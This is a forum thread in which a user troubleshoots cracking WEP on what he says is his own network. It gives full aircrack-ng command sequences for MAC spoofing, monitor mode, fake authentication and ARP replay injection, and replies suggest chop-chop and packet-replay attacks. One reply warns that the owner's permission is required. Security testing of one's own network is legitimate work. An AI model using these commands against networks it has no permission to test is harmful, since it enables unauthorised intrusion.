Results 1 to 9 of 9

Thread: wep problem

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    3

    Default wep problem

    Hello,
    I am currently trying to crack a wep connection with arp injection. I managed to get an arp message.
    Here are the commands I typed, in order:

    - ifconfig (to learn that my interface is called wlan0)
    - macchanger --mac 00:11:22:33:44:55 wlan0
    - airodump-ng wlan0 to learn that my targeted network has willy as essid, is on channel 11 and has for bssid aa:bb:cc:dd:ee:ff (it's not the true address but I modified it to simplify the reading of this post)
    - airmon-ng start wlan0 11
    - aireplay-ng -9 -e Willy -a aa:bb:cc:dd:ee:ff mon0
    I received "injection is working" and a 30/30 100%
    - airodump-ng -c 11 --bssid aa:bb:cc:dd:ee:ff -w output mon0
    Then in a second shell:
    - aireplay-ng -1 6000 -o 1 -q 10 -e Willy -a aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
    After a few lines I received "association successfull" and then regularly:
    Sending keep Alive packet [ACK]
    I then open one last shell and type:
    - aireplay-ng -3 -b aa:bb:cc:dd:ee:ff -h 00:11:22:33:44:55 mon0
    And I wait until I receive an arp packet.
    The problem is that, after I receive one, the sending packets are increasing in the third and last shell, and I still receive acknowlegdment packets in the second shell, but the #data column in the first shell still isn't increasing by much (around +1/minute only)
    How can that be ?
    Don't hesitate to ask any further questions or ask me to do any tests (tcpdump...) that you feel relevant.
    Thanks.

  2. #2
    Member
    Join Date
    May 2011
    Location
    Israel
    Posts
    74

    Default Re: wep problem

    Make some traffic by pinging non-existing host in order to gather more IV vectors there is also option to use other data frames and not only ARP packets , sometimes you will be dissasociated due to inactivity (reason 4).
    Some AP can fight off such a attacks.
    Read google scholar you will find there many papers describing security and insecurity of 802.11.
    Learn and understand the theory of wi-fi.
    Scientia ac Labore

  3. #3
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    3

    Default Re: wep problem

    Hello,

    thanks for the reply.
    How can I ping a host if I'm not inside the network ?
    I don't think I am dissasociated, I used the parameter -q 10 (I keep sending keep alive packets, and I receive ACKs).

  4. #4
    Just burned his ISO
    Join Date
    Jun 2011
    Location
    On The Earth
    Posts
    1

    Default Re: wep problem

    #DATA packets increases when someone is using that network try to attack at the time when you feel that time someone is using that network

  5. #5
    Member
    Join Date
    May 2011
    Location
    Israel
    Posts
    74

    Default Re: wep problem

    How can I ping a host if I'm not inside the network
    I thought that it is your network.
    I don't think I am dissasociated
    Sometimes AP will send disassociation frame because of inactivity it is implemented by some TP-LINK routers.
    Scientia ac Labore

  6. #6
    Just burned his ISO
    Join Date
    Jun 2011
    Posts
    3

    Default Re: wep problem

    iliyapolak,
    Yes it is my network, but I don't want to use the computers that are already connected to the network to help me crack the connection, otherwise there is no sense in trying to crack it in the first place.
    I don't think I am disassociated due to inactivity, since I'm sending aireplay-ng -1 6000 -q 10, thus regularly sending keep alive packets.

    internetspider,
    I would rather not wait that long, it would take forever. Instead I want to generate the necessary traffic with aireplay, with arp replay for example

  7. #7
    Member
    Join Date
    May 2011
    Location
    Israel
    Posts
    74

    Default Re: wep problem

    I would rather not wait that long, it would take forever. Instead I want to generate the necessary traffic with aireplay, with arp replay for example
    Newer AP are less vulnerable to aircrack attacks even when WEP is switched on.Maybe there is implemented some kind of custom replay protection.
    To completely answer your question an access to AP source code or dissasembled binary is needed.
    Last edited by iliyapolak; 06-23-2011 at 06:25 AM.
    Scientia ac Labore

  8. #8
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    19

    Default Re: wep problem

    Check that close enough because you could be sending keepalives to quickly and your dropping packets due to low signal, also try other forms of attacks, chop-chop, Standard attack ect,

    Make sure you have the owners permission as this is against the law in some/most countries and can be arrested for breaking into peoples networks.

  9. #9
    Senior Member ShadowMaster's Avatar
    Join Date
    Jul 2011
    Location
    /root
    Posts
    189

    Default Re: wep problem

    why not troubleshoot like this.
    associate with bt5 wothout trying to send keep alive packets. -1 0 -e...
    start the arp replay
    ping from another computer to get one
    kill the arp attack
    remove the other computer ensuring a clientless network
    reassociate with bt5
    use the packet replay attack with thesaved arppacket aireplay-ng -2 -r [saved packet from arp replay] [interface]
    if that doesnt work then you know theres an issue
    if this is unclear i can explain further

Similar Threads

  1. Booting problem/Flash player problem.
    By Archaic in forum OLD BT3final Support
    Replies: 0
    Last Post: 09-15-2009, 11:37 PM
  2. Replies: 3
    Last Post: 06-17-2008, 08:08 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •